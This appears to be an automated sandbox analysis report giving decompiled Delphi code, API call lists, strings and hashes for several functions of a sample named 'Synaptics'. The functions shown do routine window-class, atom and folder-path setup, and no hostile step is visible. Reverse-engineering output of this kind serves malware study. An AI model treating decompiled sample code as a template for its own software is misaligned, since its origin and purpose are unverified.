                                                                                                                                                                                                                            0x00459480
                                                                                                                                                                                                                            0x00459482
                                                                                                                                                                                                                            0x00459484
                                                                                                                                                                                                                            0x00459489
                                                                                                                                                                                                                            0x0045948a
                                                                                                                                                                                                                            0x0045948c
                                                                                                                                                                                                                            0x00459492
                                                                                                                                                                                                                            0x0045949e
                                                                                                                                                                                                                            0x004594a3
                                                                                                                                                                                                                            0x004594a8
                                                                                                                                                                                                                            0x004594ab
                                                                                                                                                                                                                            0x004594b1
                                                                                                                                                                                                                            0x004594b6
                                                                                                                                                                                                                            0x004594bd
                                                                                                                                                                                                                            0x004594c3
                                                                                                                                                                                                                            0x004594c7
                                                                                                                                                                                                                            0x004594cc
                                                                                                                                                                                                                            0x004594d4
                                                                                                                                                                                                                            0x004594d8
                                                                                                                                                                                                                            0x004594e5
                                                                                                                                                                                                                            0x004594e9
                                                                                                                                                                                                                            0x004594f0
                                                                                                                                                                                                                            0x004594f8
                                                                                                                                                                                                                            0x004594fc
                                                                                                                                                                                                                            0x004594fc
                                                                                                                                                                                                                            0x00459503
                                                                                                                                                                                                                            0x0045950c
                                                                                                                                                                                                                            0x00459516
                                                                                                                                                                                                                            0x00459523
                                                                                                                                                                                                                            0x00459528
                                                                                                                                                                                                                            0x00459530
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                                                            • GetClassInfoA.USER32 ref: 00459413
                                                                                                                                                                                                                            • RegisterClassA.USER32 ref: 0045942B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004594C7
                                                                                                                                                                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                                                                                                                                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                                                                                                                                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                                                                                                            • String ID: /B$@u@$LI
                                                                                                                                                                                                                            • API String ID: 2103932818-2136969242
                                                                                                                                                                                                                            • Opcode ID: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                                                            • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x21e1290
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
				 *0x49eb24 = _t27;
				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x21e12ac
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x21e12ac
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				E00445F34();
				 *0x49eb18 = E00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                                                                                                                                                                                            0x00446339
                                                                                                                                                                                                                            0x0044633c
                                                                                                                                                                                                                            0x00446341
                                                                                                                                                                                                                            0x00446342
                                                                                                                                                                                                                            0x00446347
                                                                                                                                                                                                                            0x0044634a
                                                                                                                                                                                                                            0x00446356
                                                                                                                                                                                                                            0x00446359
                                                                                                                                                                                                                            0x00446367
                                                                                                                                                                                                                            0x00446374
                                                                                                                                                                                                                            0x00446379
                                                                                                                                                                                                                            0x00446384
                                                                                                                                                                                                                            0x00446389
                                                                                                                                                                                                                            0x00446393
                                                                                                                                                                                                                            0x00446398
                                                                                                                                                                                                                            0x0044639b
                                                                                                                                                                                                                            0x004463a4
                                                                                                                                                                                                                            0x004463a7
                                                                                                                                                                                                                            0x004463b8
                                                                                                                                                                                                                            0x004463c5
                                                                                                                                                                                                                            0x004463ca
                                                                                                                                                                                                                            0x004463da
                                                                                                                                                                                                                            0x004463e0
                                                                                                                                                                                                                            0x004463f0
                                                                                                                                                                                                                            0x00446401
                                                                                                                                                                                                                            0x00446406
                                                                                                                                                                                                                            0x00446417
                                                                                                                                                                                                                            0x00446425
                                                                                                                                                                                                                            0x0044642a
                                                                                                                                                                                                                            0x00446430
                                                                                                                                                                                                                            0x0044643b
                                                                                                                                                                                                                            0x00446440
                                                                                                                                                                                                                            0x00446446
                                                                                                                                                                                                                            0x00446448
                                                                                                                                                                                                                            0x00446451
                                                                                                                                                                                                                            0x00446460
                                                                                                                                                                                                                            0x00446465
                                                                                                                                                                                                                            0x00446474
                                                                                                                                                                                                                            0x00446478
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x0044648c
                                                                                                                                                                                                                            0x0044648f
                                                                                                                                                                                                                            0x00446492
                                                                                                                                                                                                                            0x0044649a
                                                                                                                                                                                                                            0x004464a7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                              • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                                                              • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                              • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                              • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                              • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                                                            • API String ID: 2159221912-974380857
                                                                                                                                                                                                                            • Opcode ID: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                                                            • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4054742221fa1dac02399adf8f82c416533d39d02c8191dbacb8c2073790023
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004730FC Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v273;
				char _v280;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				signed int _t29;
				int _t59;
				int _t63;
				intOrPtr* _t81;
				signed int _t84;
				int _t91;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr _t112;

				_t91 = __edx;
				_t29 = __eax;
				_t110 = _t111;
				_t112 = _t111 + 0xfffffed0;
				_v308 = 0;
				_v304 = 0;
				_v300 = 0;
				_v280 = 0;
				_t81 = __edx;
				_push(_t110);
				_push(0x473306);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t112;
				_t84 = __eax;
				if(__eax > 6) {
					L8:
					if(_t29 != 7) {
						_t23 =  &_v8; // 0x476337
						SHGetSpecialFolderLocation(0, _t91, _t23); // executed
						_t25 =  &_v8; // 0x476337
						SHGetPathFromIDList( *_t25,  &_v273); // executed
						E0040A174( &_v273, _t81);
					} else {
						_push(_t110);
						_push(0x4732a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E00472EF0( &_v280, _t81, _t84, 0);
						E00404DCC(_v280, 0x47331c);
						if(0 == 0) {
							_t13 =  &_v8; // 0x476337
							SHGetSpecialFolderLocation(0, 5, _t13);
							_t15 =  &_v8; // 0x476337
							SHGetPathFromIDList( *_t15,  &_v273);
							E0040A174( &_v273,  &_v300);
							E00409D30(_v300, _t81);
							E00404CCC( &_v304, "\\Downloads",  *_t81);
							_t59 = E00409A58(_v304);
							__eflags = _t59;
							if(_t59 == 0) {
								E00404CCC( &_v308, 0x473390,  *_t81);
								_t63 = E00409A58(_v308);
								__eflags = _t63;
								if(_t63 == 0) {
									E004049C0(_t81);
								} else {
									E00404C88(_t81, 0x473390);
								}
							} else {
								E00404C88(_t81, "\\Downloads");
							}
						} else {
							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
							 *_t108( &_v296, 0, 0,  &_v12); // executed
							E00404BE8(_t81, _v12);
						}
						_pop(_t100);
						 *[fs:eax] = _t100;
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(E0047330D);
					E004049E4( &_v308, 3);
					return E004049C0( &_v280);
				}
				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
					case 0:
						goto L8;
					case 1:
						_t91 = 0x1a;
						goto L8;
					case 2:
						__edx = 0x1c;
						goto L8;
					case 3:
						__edx = 0x23;
						goto L8;
					case 4:
						__edx = 0x2e;
						goto L8;
					case 5:
						__edx = 5;
						goto L8;
					case 6:
						__edx = 0;
						__eflags = 0;
						goto L8;
				}
			}























                                                                                                                                                                                                                            0x004730fc
                                                                                                                                                                                                                            0x004730fc
                                                                                                                                                                                                                            0x004730fd
                                                                                                                                                                                                                            0x004730ff
                                                                                                                                                                                                                            0x0047310a
                                                                                                                                                                                                                            0x00473110
                                                                                                                                                                                                                            0x00473116
                                                                                                                                                                                                                            0x0047311c
                                                                                                                                                                                                                            0x00473122
                                                                                                                                                                                                                            0x00473126
                                                                                                                                                                                                                            0x00473127
                                                                                                                                                                                                                            0x0047312c
                                                                                                                                                                                                                            0x0047312f
                                                                                                                                                                                                                            0x00473132
                                                                                                                                                                                                                            0x00473137
                                                                                                                                                                                                                            0x00473181
                                                                                                                                                                                                                            0x00473184
                                                                                                                                                                                                                            0x004732b4
                                                                                                                                                                                                                            0x004732bb
                                                                                                                                                                                                                            0x004732c7
                                                                                                                                                                                                                            0x004732cb
                                                                                                                                                                                                                            0x004732d8
                                                                                                                                                                                                                            0x0047318a
                                                                                                                                                                                                                            0x0047318c
                                                                                                                                                                                                                            0x0047318d
                                                                                                                                                                                                                            0x00473192
                                                                                                                                                                                                                            0x00473195
                                                                                                                                                                                                                            0x0047319e
                                                                                                                                                                                                                            0x004731ae
                                                                                                                                                                                                                            0x004731b3
                                                                                                                                                                                                                            0x004731fe
                                                                                                                                                                                                                            0x00473206
                                                                                                                                                                                                                            0x00473212
                                                                                                                                                                                                                            0x00473216
                                                                                                                                                                                                                            0x00473227
                                                                                                                                                                                                                            0x00473234
                                                                                                                                                                                                                            0x00473246
                                                                                                                                                                                                                            0x00473251
                                                                                                                                                                                                                            0x00473256
                                                                                                                                                                                                                            0x00473258
                                                                                                                                                                                                                            0x00473275
                                                                                                                                                                                                                            0x00473280
                                                                                                                                                                                                                            0x00473285
                                                                                                                                                                                                                            0x00473287
                                                                                                                                                                                                                            0x00473299
                                                                                                                                                                                                                            0x00473289
                                                                                                                                                                                                                            0x00473290
                                                                                                                                                                                                                            0x00473290
                                                                                                                                                                                                                            0x0047325a
                                                                                                                                                                                                                            0x00473261
                                                                                                                                                                                                                            0x00473261
                                                                                                                                                                                                                            0x004731b5
                                                                                                                                                                                                                            0x004731cc
                                                                                                                                                                                                                            0x004731e1
                                                                                                                                                                                                                            0x004731ed
                                                                                                                                                                                                                            0x004731f4
                                                                                                                                                                                                                            0x004731f4
                                                                                                                                                                                                                            0x004732a0
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732df
                                                                                                                                                                                                                            0x004732e2
                                                                                                                                                                                                                            0x004732e5
                                                                                                                                                                                                                            0x004732f5
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473139
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047315c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473163
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047316a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473171
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473178
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 004731BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,7cG,00000000,004732A8,?,00000000,00473306,?,?,00476294,00000001,?,00476337), ref: 00473206
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(7cG,?), ref: 00473216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                                                                                                                                                                                            • String ID: 7cG$SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                                                                                                                                                                                            • API String ID: 2341558874-1217846894
                                                                                                                                                                                                                            • Opcode ID: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                                                            • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7adf5945205450d3ce6c7d6fe9dd1f0e15b7de5a75cfa9d525413354a73d1a74
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043E6BC Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 320 43e7f1-43e804 GetWindowLongA 307->320 321 43e7ec call 40e79c 307->321 308->309 309->307 313 43e7c8 call 40e79c 309->313 310->311 312 43e70b-43e71a call 403d78 310->312 311->303 312->311 323 43e71c-43e726 call 441704 312->323 313->307 325 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 320->325 326 43e806-43e816 GetWindowLongA 320->326 321->320 323->303 339 43e853-43e857 325->339 326->325 331 43e818-43e822 SetWindowLongA 326->331 331->325 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43e87d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00437D70;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E79C(_t94, _t95, _t109, _t111);
						}
					}
					 *0x49bc20 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E79C(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00441A14(_t111);
					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403DE8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x43e884);
					return E004049C0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x49dc4c; // 0x422f30
						E00406A70(_t86,  &_v196);
						_t95 = _v196;
						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00404378();
					} else {
						_t108 =  *0x437498; // 0x4374e4
						if(E00403D78(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00441704(_t94);
					}
					goto L7;
				}
			}




















                                                                                                                                                                                                                            0x0043e6bc
                                                                                                                                                                                                                            0x0043e6bc
                                                                                                                                                                                                                            0x0043e6c5
                                                                                                                                                                                                                            0x0043e6c9
                                                                                                                                                                                                                            0x0043e6cf
                                                                                                                                                                                                                            0x0043e6d3
                                                                                                                                                                                                                            0x0043e6d4
                                                                                                                                                                                                                            0x0043e6d9
                                                                                                                                                                                                                            0x0043e6dc
                                                                                                                                                                                                                            0x0043e6e7
                                                                                                                                                                                                                            0x0043e6e9
                                                                                                                                                                                                                            0x0043e6f3
                                                                                                                                                                                                                            0x0043e768
                                                                                                                                                                                                                            0x0043e76b
                                                                                                                                                                                                                            0x0043e780
                                                                                                                                                                                                                            0x0043e788
                                                                                                                                                                                                                            0x0043e78a
                                                                                                                                                                                                                            0x0043e78d
                                                                                                                                                                                                                            0x0043e79e
                                                                                                                                                                                                                            0x0043e7a8
                                                                                                                                                                                                                            0x0043e7a8
                                                                                                                                                                                                                            0x0043e7ad
                                                                                                                                                                                                                            0x0043e7b7
                                                                                                                                                                                                                            0x0043e7c6
                                                                                                                                                                                                                            0x0043e7c8
                                                                                                                                                                                                                            0x0043e7c8
